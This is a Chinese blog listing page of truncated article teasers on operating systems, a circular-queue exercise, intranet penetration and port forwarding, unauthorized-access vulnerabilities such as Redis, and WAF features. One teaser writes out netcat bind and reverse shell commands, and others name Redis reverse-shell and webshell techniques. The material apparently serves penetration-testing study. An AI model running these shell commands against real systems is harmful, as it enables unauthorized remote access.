摘要:
转自https://blog.csdn.net/weixin_42229896/article/details/80736517 假脱机的概念 SPOOLing技术:利用高速共享设备(通常是磁鼓或者是磁带)将低速的独享设备模拟为高速的共享设备,这样,从逻辑上讲,计算机系统为每一个用户都分配了一台独立 阅读全文
摘要:
622. 设计循环队列 难度中等89收藏分享切换为英文关注反馈 设计你的循环队列实现。 循环队列是一种线性数据结构,其操作表现基于 FIFO(先进先出)原则并且队尾被连接在队首之后以形成一个循环。它也被称为“环形缓冲器”。 循环队列的一个好处是我们可以利用这个队列之前用过的空间。在一个普通队列里,一 阅读全文
摘要:
使用ew完成多场景下内网代理穿透 日期 2019-04-20 基础,内网渗透,代理穿透,端口转发 作者 amm907 共0评论 0x01 需求 当渗透进行到内网,常需要将流量代理到内网进行进一步扩展如: 端口扫描 端口转发 访问内网web服务 …… 0x02 场景 以下模拟一个使用场景。 1、环境配 阅读全文
摘要:
内网渗透中的端口转发 需要知道,在渗透的整个流程中,根据web应用或者开放的端口进行渗透,获取webshell只是渗透这门艺术的一小部分,在真实的错综复杂的企业环境中进行内网渗透,其实水很深,涉及内网穿透,端口转发,域渗透,提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了 阅读全文
摘要:
内网渗透常见端口转发方式 Feb 2, 2018 本篇文章主要是总结一下常见端口转发姿势。 0x01 前言 网络拓扑 0x02 lcx lcx 参数 端口映射 - 无法访问内网情况下 端口转发 - 能够访问内网某台主机 0x03 netsh 说明 安装IPV6 转发 删除转发记录 查看转发记录 0x 阅读全文
摘要:
内网渗透之端口转发、映射、代理 裁决 / 2019-09-18 09:22:14 / 浏览数 13714 渗透测试 渗透测试顶(7) 踩(0) 端口转发&端口映射 0x01 什么是端口转发 端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH)为网络安全通信使用的一种方法。端 阅读全文
摘要:
内网渗透的边界场景分析+内网代理整理 先从nc开始理解正向代理和反向代理: 1、正向连接 受害者主机执行 nc -e -t /bin/bash -lvp 7777 攻击者执行 nc -t 192.168.16.X 7777 2、反向连接 受害者主机执行 nc -t -e cmd.exe 192.16 阅读全文
摘要:
未授权访问漏洞总结 karlbrain 2019-07-27 共282627人围观 ,发现 1 个不明物体 WEB安全 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面 阅读全文
摘要:
未授权访问漏洞总结 2017年09月30日 漏洞分析 目录 前言 0x01 介绍 0x02 Redis未授权访问 2.1 漏洞描述 2.2 漏洞利用 1、利用计划任务执行命令反弹shell 2、写 ssh-keygen 公钥登录服务器 3、获取 web 服务的 webshell 2.3 漏洞加固 0 阅读全文
摘要:
功能 名称描述 Web攻击防护 抵御各类Web应用攻击,如SQL注入、命令执行、XSS等。 CC安全防护 独家算法防护引擎、结合大数据、秒级拦截机器恶意CC攻击。 精准访问控制(黑白名单) 针对性地拦截或放行某次访问。 高频Web攻击IP自动封禁 自动封禁在短时间内进行多次Web攻击的客户端IP。 阅读全文